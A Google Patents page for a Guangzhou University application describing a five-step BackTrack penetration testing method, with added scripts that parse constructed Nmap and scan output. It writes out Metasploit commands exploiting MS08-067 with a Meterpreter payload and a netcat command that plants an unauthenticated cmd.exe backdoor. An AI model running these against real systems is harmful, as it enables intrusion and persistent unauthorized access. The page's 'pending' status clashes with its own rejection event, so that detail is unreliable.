CN103400077A - Penetration testing method based on BackTrack - Google Patents

Penetration testing method based on BackTrack

Info

Publication number
CN103400077A
Authority
CN (China)
Prior art keywords
penetration testing, backtrack, scanning, vulnerability, target
Legal status
Pending (as listed by Google Patents; the status is an assumption, not a legal conclusion)
Application number
CN2013103327735A
Other languages
Chinese (zh)
Inventors
谢冬青 (Xie Dongqing)
欧家权 (Ou Jiaquan)
Current assignee
Guangzhou University
Original assignee
Guangzhou University
Priority date
2013-08-01
Filing date
2013-08-01
Publication date
2013-11-20
Events
2013-08-01  Application filed by Guangzhou University
2013-08-01  Priority to CN2013103327735A
2013-11-20  Publication of CN103400077A
Current legal status: pending

Landscapes

  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention provides a penetration testing method based on BackTrack. The method consists of the following steps: first, obtain information about the target system, such as its list of IP addresses, through reconnaissance; second, obtain the target's live-host list, port mapping table and vulnerability list through scanning; third, break into the target system through identified exploitable vulnerabilities; fourth, maintain access to a target host that has been successfully attacked; finally, turn the material gathered from the accessed target host into a proper penetration testing report. The method addresses the technical problem that existing penetration testing techniques are comparatively complex, and has the advantages of being concise, clear, easy to use and highly practicable.

Description

A penetration testing method based on BackTrack
Technical field
The present invention relates to a penetration testing method, and specifically to a penetration testing method based on BackTrack.
Background technology
Penetration testing (sometimes shortened to pentest) is a set of processes whose core is security assessment and audit: a legal and authorized attempt to find vulnerabilities in computer systems and to exploit them successfully, with the aim of making the assessed systems more secure. Because there is no single clear-cut standard for penetration testing, the method used depends on the tester's skill and habits, or on methods drawn up by security organizations. One example is NIST SP 800-115, the guidance document published by the US National Institute of Standards and Technology, which describes a penetration testing method composed of planning, discovery, attack and reporting.
Another is the Information Systems Security Assessment Framework (ISSAF), an open-source security testing and analysis framework that proposes dividing the assessed system into domains according to its business logic and then carrying out the security assessment domain by domain. The Open Source Security Testing Methodology Manual (OSSTMM) is a widely recognized industry standard for security testing; it proposes a testing method built from scope, channels, index and vector, and establishes a technical guide for comprehensively testing the target environment.
The Penetration Testing Execution Standard (PTES) is a newer standard that is still developing. It divides penetration testing into seven phases: pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation and reporting.
Although the methods set out above give direction for penetration testing, they are comparatively complex to apply in practice. The present invention therefore takes the PTES standard as its basis and, combining it with the characteristics of the BackTrack toolset, proposes a penetration testing method based on BackTrack.
Summary of the invention
In order to solve the technical problem that existing penetration testing techniques are comparatively complex, the invention provides a penetration testing method based on BackTrack.
The specific method provided by the invention is as follows:
A penetration testing method based on BackTrack, comprising:
1) obtaining information about the target system, such as its IP address table, through reconnaissance;
2) obtaining the target's live-host list, port mapping table and vulnerability list through scanning;
3) breaking into the target system through the exploitable vulnerabilities that have been identified;
4) maintaining access to the target host after a successful attack;
5) turning the content obtained from the accessed target host into a proper penetration testing report.
Preferably, the reconnaissance in step 1 consists of active reconnaissance and passive reconnaissance.
Preferably, the scanning consists of live-host scanning, port scanning and vulnerability scanning.
Preferably, vulnerability exploitation means that, once some exploitable vulnerabilities have been identified, the Metasploit exploitation framework built into BackTrack is used to exploit them (for example, by triggering an overflow).
Preferably, a proper penetration testing report comprises an executive summary, which describes the penetration testing phases in general terms, and a detailed technical report, which analyzes the findings of the summary in depth.
Preferably, live-host scanning verifies whether a system exists using the most common and general technique, a ping scan; BackTrack's built-in ping-scan tools FPing, arping and arping2 let the tester identify whether a target is online, and the tool's output is finally assembled into the target's live-host list.
Preferably, port scanning proceeds once a target has been identified and a target address is available: it determines which services the target system has enabled, so that more information can be mined from them, and yields the port mapping table.
Preferably, vulnerability scanning takes the port mapping table obtained from port scanning, sets a scan policy, runs the vulnerability scan and yields the vulnerability list.
Implementing the present invention has the following advantages:
The invention takes the BackTrack system, a platform dedicated to penetration testing, as its platform and proposes a penetration testing method based on reconnaissance, scanning, vulnerability exploitation, maintaining access and report generation. Where other penetration testing methods are comparatively complex, this method is concise, easy to use and highly practicable.
Description of drawings
Fig. 1 is the flow diagram of the penetration testing method of the present invention.
Embodiment
The BackTrack-based penetration testing method provided by the invention divides penetration testing into five concise steps: reconnaissance, scanning, vulnerability exploitation, maintaining access and report generation. A mature methodology benefits penetration testing work; the many popular methodologies in the field each have their own strengths, but most are rather complex. Drawing on a combination of those methodologies, the invention proposes a five-step BackTrack-based penetration testing method that is easy to learn and apply, namely reconnaissance, scanning, vulnerability exploitation, maintaining access and report generation.
The specific implementation is as follows:
Step 1, the reconnaissance phase. Reconnaissance is divided into active and passive reconnaissance; its ultimate purpose is to obtain information about the target system such as its IP address table. The BackTrack system contains many excellent reconnaissance tools, and HTTrack is one of them: it copies an entire website and creates an offline copy identical to the target site, so that the site can be examined for vulnerabilities offline without repeated exchanges with the server, which reduces the chance of being detected. Mirroring the site does itself contact the target's web server, so HTTrack belongs to active reconnaissance; the stealth benefit lies in the analysis that follows. Once active reconnaissance has gathered the relevant information about the target system, the passive reconnaissance phase follows, for which BackTrack pre-installs effective tools such as Whois and Nslookup.
Step 2, the scanning phase. Scanning is divided into live-host scanning, port scanning and vulnerability scanning.
Live-host scanning. The most common and general way to verify whether a system exists is a ping scan. BackTrack has the ping-scan tool FPing built in, together with tools such as arping and arping2, which the tester uses to identify whether a target is online. The result is the target's live-host list, for example:
Valid IP address list
IP address
10.244.175.5
10.244.175.6
10.244.175.10
10.244.175.11
10.244.175.12
10.244.175.13
After target identification there is a target address, and port scanning can proceed; its purpose is to identify which services the target system has enabled so that more information can be mined from them. If, for example, port 80 is open on a target address, subsequent tools can connect to that port and keep collecting information about the web service listening on it. BackTrack has many port scanners built in; Nmap is an outstanding one and meets most needs. Besides basic port scanning, Nmap can also load specific scripts to perform vulnerability scanning, through the "--script" parameter; Nmap's script library lives by default in the directory "/usr/share/nmap/scripts". Port scanning yields an open-port list such as the following (it also lists 10.244.175.14 and 10.244.175.254, which are absent from the live-host list above; hosts that do not answer a ping sweep can still have open ports):
IP address and port mapping
IP address       Open ports           Operating system
10.244.175.5     135, 139, 445, 21    Windows XP SP1
10.244.175.6     135, 139, 445, 21    Windows XP SP3
10.244.175.10    443, 6003, 3306      Linux
10.244.175.11    443, 6003, 3306      Linux
10.244.175.12    443, 80, 1433        Windows XP SP3
10.244.175.13    443, 6004, 3306      Linux
10.244.175.14    443, 6004, 3306      Linux
10.244.175.254   23                   Router
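The shell script below is an added example, not part of the patent, showing how the live-host list and the port mapping table above are produced from Nmap's greppable (-oG) output. The two Nmap commands in its comments are what a tester would type on BackTrack; the scan output embedded in the script is constructed to mirror the tables above (it is not real scan output) so that the script runs offline.

```sh
#!/bin/sh
# Added example (not from the patent): build the live-host list and the port
# mapping table from Nmap greppable (-oG) output.  On BackTrack the real
# commands would be, for the subnet used in the patent's tables:
#   nmap -sn 10.244.175.0/24 -oG alive.gnmap      # ping sweep (live hosts)
#   nmap -sS -O -iL alive.txt -oG ports.gnmap     # SYN scan + OS detection
# The two "files" below are CONSTRUCTED samples in -oG format, not real output.

ALIVE_GNMAP='# Nmap 6.01 scan initiated (constructed sample)
Host: 10.244.175.5 ()	Status: Up
Host: 10.244.175.6 ()	Status: Up
Host: 10.244.175.10 ()	Status: Up
Host: 10.244.175.254 ()	Status: Up
# Nmap done: 256 IP addresses (4 hosts up) scanned'

PORTS_GNMAP='# Nmap 6.01 scan initiated (constructed sample)
Host: 10.244.175.5 ()	Ports: 21/open/tcp//ftp///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///	Ignored State: closed (996)	OS: Microsoft Windows XP SP1	Seq Index: 20
Host: 10.244.175.10 ()	Ports: 443/open/tcp//https///, 3306/open/tcp//mysql///, 6003/open/tcp//x11///	Ignored State: filtered (997)	OS: Linux 2.6.X	Seq Index: 1024
Host: 10.244.175.254 ()	Ports: 23/open/tcp//telnet///, 80/closed/tcp//http///	Ignored State: filtered (998)	OS: Router	Seq Index: 50
# Nmap done: 3 IP addresses (3 hosts up) scanned'

# survival_list: print the address of every host nmap reported "Status: Up".
# Reads a -sn -oG file on stdin; the output is what the port scan takes via -iL.
survival_list() {
    awk '$1 == "Host:" && /Status: Up/ { print $2 }'
}

# port_map: one tab-separated row per host: IP, open ports (comma list), OS.
# Each -oG "Ports:" entry is port/state/proto//service///; only "open" entries
# are kept, so closed or filtered ports never reach the table.  Field boundaries
# are matched on the field names, so it does not matter whether nmap's tab
# separators survived copy-and-paste.
port_map() {
    awk '$1 == "Host:" && /Ports: / {
        ip = $2
        line = $0
        sub(/.*Ports: /, "", line)
        sub(/[ \t]+(Ignored State|OS|Seq Index|IP ID Seq):.*/, "", line)
        n = split(line, entries, ", ")
        ports = ""
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] == "open")
                ports = (ports == "" ? f[1] : ports "," f[1])
        }
        os = "-"
        if ($0 ~ /OS: /) {
            os = $0
            sub(/.*OS: /, "", os)
            sub(/[ \t]+(Seq Index|IP ID Seq):.*/, "", os)
        }
        if (ports != "") print ip "\t" ports "\t" os
    }'
}

# Stand-alone run: print both tables the way the patent's scanning step does.
echo "Valid IP address list"
printf '%s\n' "$ALIVE_GNMAP" | survival_list
echo
echo "IP address	Open ports	Operating system"
printf '%s\n' "$PORTS_GNMAP" | port_map
```

Only ports in state "open" reach the table; the closed port 80 on 10.244.175.254 is dropped, which is the behaviour the patent's table implies when it lists a single port for the router.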
After port scanning there is a port mapping table, and vulnerability scanning can proceed. This project uses Nessus as the vulnerability scanner. Nessus is powerful and exceptionally easy to use: after installation its server side is reached by visiting https://127.0.0.1:8834, and scanning can begin once a scan policy has been set. Vulnerability scanning yields a vulnerability list such as:
Vulnerability list
[Table reproduced in the original as two figures, BDA00003609674000041 and BDA00003609674000051; its contents are not recoverable here.]
The scan finds that the host at IP 10.244.175.5 has two high-risk and three medium-risk vulnerabilities. These can be mined in depth, and exploiting them can take control of the target host.
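As an added example that is not part of the patent, the script below performs the triage with which the scanning step ends: it reads a vulnerability scanner export, counts Critical/High and Medium findings per host, and lists the hosts worth carrying into step 3. The CSV rows are constructed to mirror the patent's finding for 10.244.175.5 (two high-risk and three medium-risk issues) and are not real Nessus output; a real Nessus CSV export quotes its fields and can embed commas in them, so this simplified sample keeps every field comma-free and relies on awk -F, only for that reason.

```sh
#!/bin/sh
# Added example (not from the patent): triage a vulnerability scan export so the
# tester knows which hosts to carry into the exploitation step.
# CONSTRUCTED rows, not real Nessus output; they mirror the patent's result that
# 10.244.175.5 has two high-risk and three medium-risk findings.  A real Nessus
# CSV export quotes fields and may embed commas; this sample is kept comma-free
# so that plain awk -F, can split it.
VULN_CSV='Risk,Host,Port,Name
High,10.244.175.5,445,Windows Server service RPC remote code execution (MS08-067)
High,10.244.175.5,445,Windows XP SP1 installation no longer receives security updates
Medium,10.244.175.5,21,FTP anonymous login permitted
Medium,10.244.175.5,445,SMB signing not required
Medium,10.244.175.5,139,SMB NULL session authentication allowed
Medium,10.244.175.10,443,SSL certificate is self-signed
Low,10.244.175.10,3306,MySQL server banner disclosure
Medium,10.244.175.254,23,Unencrypted Telnet service
Info,10.244.175.254,23,Telnet service detected'

# severity_summary: one tab-separated row per host: host, critical+high count,
# medium count; sorted so the most exposed host comes first.
severity_summary() {
    awk -F, 'NR > 1 {
        seen[$2] = 1
        if ($1 == "Critical" || $1 == "High") high[$2]++
        else if ($1 == "Medium") med[$2]++
    }
    END {
        for (h in seen) printf "%s\t%d\t%d\n", h, high[h] + 0, med[h] + 0
    }' | sort -t "$(printf '\t')" -k2,2nr -k3,3nr
}

# exploit_candidates: hosts with at least one Critical/High finding; these are
# the targets for step 3.  Hosts with only Medium/Low findings are reported but
# not attacked first.
exploit_candidates() {
    severity_summary | awk -F'\t' '$2 > 0 { print $1 }'
}

# host_findings HOST: the findings for one host, highest severity first, which
# is the list the tester walks when choosing a Metasploit module (the first
# row here is what "search ms08_067" in step 3 corresponds to).
host_findings() {
    awk -F, -v host="$1" '
        BEGIN { rank["Critical"] = 0; rank["High"] = 1; rank["Medium"] = 2; rank["Low"] = 3; rank["Info"] = 4 }
        NR > 1 && $2 == host { printf "%d\t%s\t%s\t%s\n", rank[$1], $1, $3, $4 }
    ' | sort -n | cut -f2-
}

echo "host	high	medium"
printf '%s\n' "$VULN_CSV" | severity_summary
echo
echo "exploit candidates:"
printf '%s\n' "$VULN_CSV" | exploit_candidates
echo
echo "findings for 10.244.175.5:"
printf '%s\n' "$VULN_CSV" | host_findings 10.244.175.5
```

Every function reads the export on standard input, so the same pipeline works on a real export once it has been flattened by a CSV-aware tool.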
Step 3, vulnerability exploitation. Once some exploitable vulnerabilities have been identified, the Metasploit exploitation framework built into BackTrack can be used to exploit them (for example, by triggering an overflow). The steps are as follows:
1) Start Metasploit: open a terminal in BackTrack and enter the command "msfconsole".
2) Use the "search" command to find an exploit module: msf > search ms08_067
3) Use the "use" command to select the exploit module: msf > use exploit/windows/smb/ms08_067_netapi
4) Use the "set" command to choose the payload: msf > set payload windows/meterpreter/bind_tcp
5) Use the "exploit" command to attack the target system: msf > exploit
Completing the above steps achieves the break-in to the target system (the module also needs the target address, given with the "set" command as in set RHOST 10.244.175.5, before "exploit" is run). A successful intrusion, however, takes more than identifying the target vulnerability and choosing the exploit module: the tester must also understand payloads to some degree, and the best-known payload is Meterpreter.
Step 4, maintaining access. BackTrack provides the tester with several classic backdoor programs, one of which is Netcat, the "Swiss Army knife" of networking. Netcat is a tool that lets communications and network traffic flow from one computer to another; it is very flexible and easy to use and is the first choice for creating a backdoor. After the target host 10.244.175.5 has been attacked successfully and the Meterpreter payload is running on it, Netcat can be uploaded. The basic steps are: 1) Meterpreter > upload nc.exe c:\windows\system32 uploads NC to the target host through Meterpreter; 2) nc -L -p 999 -e cmd.exe, run from a command shell on the target (for example one opened with Meterpreter's "shell" command), starts NC on the target host. The parameter "-L" selects a listen mode that keeps listening after a client disconnects, and the parameter "-e" names the program to execute for each connection; "-e" is the key parameter that realizes the backdoor function. Such a listener is unauthenticated: anyone who can reach TCP port 999 on the host obtains a command shell with the privileges of the process that started it, so the backdoor must be recorded in the report and removed when the engagement ends.
Step 5, report generation. A proper penetration testing report covers, but is not limited to, two parts: an executive summary and a detailed technical section. The executive summary describes the penetration testing phases in general terms; it need not be long or use much technical language, and it should be easy to understand so that the client gains an overall picture of the work. Important vulnerabilities found during testing should be emphasized there, preferably with links into the detailed section so that interested readers can look deeper. The second part of the report is the detailed narrative: after the first part has briefly introduced the results, the whole test process should be analyzed in detail. This part should include an inventory and the technical details of everything found during the test, and should meet the reading needs of information security colleagues.
The foregoing is only a preferred embodiment of the invention and is not intended to limit it; any modification, equivalent replacement or improvement made within the spirit and principles of the invention shall fall within its scope of protection.

Claims (8)

1. A penetration testing method based on BackTrack, characterized in that the method comprises the following steps:
1) obtaining information about the target system, such as its IP address table, through reconnaissance;
2) obtaining the target's live-host list, port mapping table and vulnerability list through scanning;
3) breaking into the target system through the exploitable vulnerabilities that have been identified;
4) maintaining access to the target host after a successful attack;
5) turning the content obtained from the accessed target host into a proper penetration testing report.
2. The BackTrack-based penetration testing method according to claim 1, characterized in that the reconnaissance in step 1 consists of active reconnaissance and passive reconnaissance.
3. The BackTrack-based penetration testing method according to claim 2, characterized in that the scanning consists of live-host scanning, port scanning and vulnerability scanning.
4. The BackTrack-based penetration testing method according to claim 3, characterized in that the vulnerability exploitation consists in, once some exploitable vulnerabilities have been identified, using the Metasploit exploitation framework built into BackTrack to exploit them (for example, by triggering an overflow).
5. The BackTrack-based penetration testing method according to claim 4, characterized in that the proper penetration testing report comprises an executive summary describing the penetration testing phases in general terms and a detailed technical report analyzing the findings of the summary in depth.
6. The BackTrack-based penetration testing method according to claim 5, characterized in that the live-host scanning verifies whether a system exists using the most common and general technique, a ping scan, with the BackTrack built-in ping-scan tools FPing, arping or arping2 used to identify whether a target is online, the tool's output finally yielding the target's live-host list for the tester.
7. The BackTrack-based penetration testing method according to claim 5, characterized in that the port scanning, once a target has been identified and a target address is available, proceeds to identify which services the target system has enabled so that more information can be mined from them, thereby obtaining the port mapping table.
8. The BackTrack-based penetration testing method according to claim 7, characterized in that the vulnerability scanning takes the port mapping table obtained after port scanning, sets a scan policy, performs the vulnerability scan and obtains the vulnerability list.
Priority Applications (1)

Application Number   Priority Date   Filing Date   Title
CN2013103327735A     2013-08-01      2013-08-01    Penetration testing method based on BackTrack (published as CN103400077A, en)

Publications (1)

Publication Number   Publication Date
CN103400077A (en)    2013-11-20

Family

ID=49563699

Family Applications (1)

Application Number Title Priority Date Filing Date
CN2013103327735A Pending CN103400077A (en) 2013-08-01 2013-08-01 Penetration testing method based on BackTrack

Country Status (1)

Country Link
CN (1) CN103400077A (en)

Patent Citations (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN102999717A (en) * 2012-11-20 2013-03-27 北京信息科技大学 Rapid implantation code generating system applied to buffer area overflow in network security permeation test

Non-Patent Citations (2)

* Cited by examiner, † Cited by third party
Title
SOSO: "基于Linux的渗透检测平台Backtrack" (BackTrack, a Linux-based penetration testing platform), 《黑客防线》 (Hacker Defence), 31 August 2009 (2009-08-31) *
张园超 (Zhang Yuanchao): "渗透测试技术研究与平台建设" (Research on penetration testing technology and platform construction), 《万方学位论文》 (Wanfang dissertation database), 29 December 2010 (2010-12-29), pages 7-31 *

Cited By (10)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103634658A (en) * 2013-12-16 2014-03-12 乐视致新电子科技(天津)有限公司 Equipment scanning method and equipment scanning device in smart television
CN104852921A (en) * 2015-05-25 2015-08-19 烽火通信科技股份有限公司 Test system and method for protecting open port from attacking for network equipment
CN105721472A (en) * 2016-02-23 2016-06-29 北京皮尔布莱尼软件有限公司 Port security check method, device and system
CN107426227A (en) * 2017-08-02 2017-12-01 江苏省邮电规划设计院有限责任公司 One kind automation safe penetration method of testing
CN107426227B (en) * 2017-08-02 2019-09-10 中通服咨询设计研究院有限公司 A kind of automation safe penetration test method
CN107566394A (en) * 2017-09-28 2018-01-09 小花互联网金融服务(深圳)有限公司 A kind of newly-increased automatic discovery of cloud platform example host and quick vulnerability scanning method
CN109039812A (en) * 2018-07-20 2018-12-18 深圳前海微众银行股份有限公司 port detecting method, system and computer readable storage medium
CN110290129A (en) * 2019-06-20 2019-09-27 深圳前海微众银行股份有限公司 A kind of method and device of Web Hole Detection
CN112347485A (en) * 2020-11-10 2021-02-09 远江盛邦(北京)网络安全科技股份有限公司 Multi-engine vulnerability acquisition and automatic penetration processing method
CN112347485B (en) * 2020-11-10 2024-05-28 远江盛邦(北京)网络安全科技股份有限公司 Processing method for acquiring loopholes and automatically penetrating multiple engines

Legal Events

Code   Title                                                          Description
C06    Publication
PB01   Publication                                                    Application publication date: 2013-11-20
C10    Entry into substantive examination
SE01   Entry into force of request for substantive examination
RJ01   Rejection of invention patent application after publication